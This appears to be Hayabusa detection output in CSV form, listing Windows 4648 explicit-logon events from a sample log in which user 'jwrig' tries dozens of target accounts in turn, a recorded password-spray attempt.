2019-05-01 04:29:41.637 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:42.734 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:43.795 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:44.875 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:45.951 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:47.017 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:48.096 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:49.176 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:50.264 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:51.340 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:52.405 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:53.466 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:54.572 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:55.671 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:56.741 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:57.817 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:58.894 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:59.965 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:01.026 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:02.115 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:03.191 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:04.272 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:05.348 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:06.426 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:07.478 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:08.564 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:09.668 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:10.717 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:11.809 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:12.857 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:13.904 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:14.972 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:16.050 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:17.129 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:18.186 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:19.254 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:20.329 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:21.401 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:22.487 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:23.577 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:24.660 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:25.732 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:26.794 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:27.863 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:28.925 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:29.993 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:31.050 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:32.142 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:33.206 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:34.265 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:35.340 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:36.403 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:37.453 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:38.533 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:39.613 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:40.691 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:41.769 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:42.852 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:43.922 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:44.998 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:46.080 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:47.159 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:48.237 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:49.314 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:50.388 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:51.455 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:52.532 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:53.613 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:54.668 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:55.714 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:56.768 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:57.850 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:58.920 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:00.029 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:01.113 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:02.172 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:03.238 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:04.300 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:05.378 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:06.439 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:07.513 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:08.581 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:09.674 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:10.754 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:11.843 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:12.917 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:13.987 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
